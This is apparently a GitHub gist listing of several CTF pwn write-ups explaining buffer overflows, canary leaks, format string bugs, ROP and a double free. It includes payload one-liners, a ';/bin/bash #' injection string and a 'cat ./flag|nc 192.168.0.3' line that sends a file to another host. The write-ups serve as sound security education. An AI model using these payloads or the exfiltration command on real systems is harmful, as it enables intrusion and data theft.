Damotorie parksjin01
parksjin01 / Codegate-prequals 2017 writeup.md
Last active June 26, 2017 07:10
Codegate-prequals 2017 writeup

babypwn

  • The program is small and simple: a normal stack overflow problem, and we can get the canary by a memory leak.
  • It's a server program, so it gets user input with the recv() function, and this function adds 0x0a at the end of the user input.
  • So if we type just 40 bytes of letters we can get the canary. The canary's last byte is overwritten with 0x0a, but it doesn't matter.
  • In most cases the canary's last byte is just \x00, so we can guess the last byte is \x00.
  • The next protection is NX; we can bypass NX with ROP and the return-to-libc method.
  • I made a [simple python script] which runs the ls -al command. But there is a critical error in the script.
  • I have to send the result to the client side, and I need to do it by redirecting IO. But I can't find how to call a libc function many times with a ROP chain in an x86 program.
  • I solved this problem. I still have a question about the ROP chain, but I solved it with a Linux command.
  • I used cat ./flag|nc 192.168.0.3 instead of ls -al and solved it. But I can't understand why other people's writeup doesn'
@parksjin01
parksjin01 / Bitsctf 2017 writeup.md
Last active June 14, 2017 12:56
Bitsctf 2017 writeup

pwn1

  • pwn1 is a really basic buffer overflow problem.
  • When we execute the program, it just prints the buffer address to us, to make calculating the address easier.
  • The buffer size is only 0x10, so I'll write the shellcode after ret.
  • This simple python script will help you pwn it.

third

  • This problem is not hard either. The only difficulty is that I couldn't see the library function names.
  • I made my own function table to make reversing easier.
@parksjin01
parksjin01 / Insomni'hack Teaser CTF 2017.md
Last active June 14, 2017 07:18
Insomni'hack Teaser CTF 2017

baby

  • This is a simple server program, and we should make a user named baby.
  • If you exec the program and connect with nc you can see 3 options (we have a time limit: in one session we can only use 15 seconds).
  • First we can do a stack overflow, second we can do an FSB, and last we can do a heap overflow.
  • I couldn't find a use for the heap overflow, but I found uses for the others.
  • This program's NX bit is enabled, so we have to leak memory to do the stack overflow.
  • With %20p*144, the last hex number is the canary.
  • The canary doesn't change after the server is turned on. That means we can check the canary first and then do the stack overflow next. (Actually, if you use an automatic script with python, you can do these things at once, but if you do this by hand you have a time limit, so you have to try many times. I recommend automatic code.)
  • In the stack overflow function, memory looks like this:
  • [canary(8byte)][buffer(1032byte)][socket_fd(8byte)]
@parksjin01
parksjin01 / UIUC-CTF 2017 writeup.md
Created April 29, 2017 15:02
UIUC-CTF 2017 writeup

Goodluck

  • There is an FSB in the program and we can print the flag with it.
  • If we write %p%p%p%p%p%p%p%p%p%p%p%p%p as input, then the 10th value to the 13th value is the flag.
  • flag: flag{always_give_110%}

snekquiz

  • If we answer all problems correctly we can only get 3 points, and we have to get exactly 5 points to get the flag.
  • We have to change the score variable by buffer overflow.
  • The memory layout is like this (input buffer -> 80 bytes, score variable -> 4 bytes, canary -> 4 bytes).
  • We can make the score 5 with this script: (python -c 'print "a"*80+"\x05"+"\x00"*4';cat)
@parksjin01
parksjin01 / 0CTF 2017 wtireup.md
Last active June 12, 2017 11:31
0CTF 2017 writeup

char

  • First, we can overflow and control eip if our input is longer than 32 letters.
  • Second, we can only type printable letters (0x20~0x7f), and we have to make the shellcode with these letters.
  • Finally, the NX bit is enabled, so we can't run shellcode in the buffer. It means we have to use ROP programming to get a shell.
  • It's a 32-bit program, so the function call convention isn't fastcall, but if we want to do ROP we have to use a fastcall function.
    The execve function uses the fastcall method even if the program is x86. Now what we have to do is make sure edi, esi, edx hold the proper arguments
    for calling execve.
  • #Not finished yet

EasiestPrintf

@parksjin01
parksjin01 / PlaidCTF 2015 writeup.md
Created April 23, 2017 15:33
PlaidCTF 2015 writeup

ebp

  • To solve this problem, we need to know and use the format string bug.
  • To explain more easily I'll suppose ASLR is turned off.
  • 0xffffd600:	0xf7fe76db	0x00000000	0xffffd628	0x0804852c
    0xffffd610:	0xffffd648	0xf7fedee0	0xf7e6662b	0x00000000
    0xffffd620:	0xf7fb9000	0xf7fb9000	0xffffd62c	0x0804a480
    0xffffd630:	0x0804a080	0x00000400	0xf7fb95a0	0x00000000
    0xffffd640:	0xf7fb9000	0xf7fb9000	0x00000000	0xf7e21637
    0xffffd650:	0x00000001	0xffffd6e4	0xffffd6ec	0x00000000

@parksjin01
parksjin01 / PlaidCTF 2016 writeup.md
Last active April 24, 2017 14:22
PlaidCTF 2016 writeup

Unix Time Formatter

  • First we have to know that we can use multiple environments; in the binary they check a debug bit and the result differs depending on that flag.
  • Also, when we try to quit the program with option 5, the free function is called first and then it asks the user whether to really quit; we can trigger a
    DFB (Double Free Bug) to get the flag.
  • At last, when this program converts a number to unix time, it uses /bin/date -d @time format, and the format is user input.
  • If we can input ';/bin/bash #\ at the format place we can get a shell; however we can only input %aAbBcCdDeFgGhHIjklmNnNpPrRsStTuUVwWxXyYzZ:-_/0^#
    these characters, so we can't input it directly. We have to use the DFB here.
  • Format: %c
    strdup(0x7fffaec863f8) = 0x251d420
@parksjin01
parksjin01 / Tamu 2017 writeup.md
Created April 22, 2017 04:01
Tamu 2017 writeup

pwn1

  • It's a really easy and simple buffer overflow problem.
  • Just input 27 dummy letters and then input \x1e\xab\x11\xca.
  • Payload: (python -c 'print "aaaaaaaaaaaaaaaaaaaaaaaaaaa"+"\x1e\xab\x11\xca"';cat)
  • flag: gigem{T00_435Y}
  • The binary is here.

pwn2

  • This is also a really easy and simple buffer overflow problem.
  • Input 0x8c dummy letters and then the address of the print_flag function (0x08048548).
@parksjin01
parksjin01 / CSAW 2016 writeup.md
Created April 8, 2017 06:12
CSAW 2016 writeup

warmup

  • First, this program is stripped, so we have to find the EP with readelf. The EP of the main function is 0x40061d.
  • Payload: [buffer]*64 + rbp + ret
  • To bypass ASLR we have to know the start address of the easy function, and it's provided.
  • The actual payload looks like this: 'a'*72+'\x0d\x06\x40\x00'+'\x00'*4
  • Its python code is here.

tutorial

  • This program also needs us to find the EP; the EP of the main function is 0x401087.
  • To execute this program locally you have to make a user named tutorial, and you have to execute the program with admin permission.
@parksjin01
parksjin01 / PicoCTF 2014 wrtieup.md
Last active April 4, 2017 13:58
PicoCTF 2014 writeup

caesar

  • As you can see in the problem title, it's a Caesar cipher problem.
  • Use a web tool to decrypt it.
  • flag: ukppnrwryeavgtwicfmnrkbnzeqawg

The Valley of Fear

  • Like an HDD sector seek: the first number in () is the paragraph, the second number is the line in the paragraph, and the third is the word in the sentence.
  • flag: the flag, is Ceremonial plates.

Substitution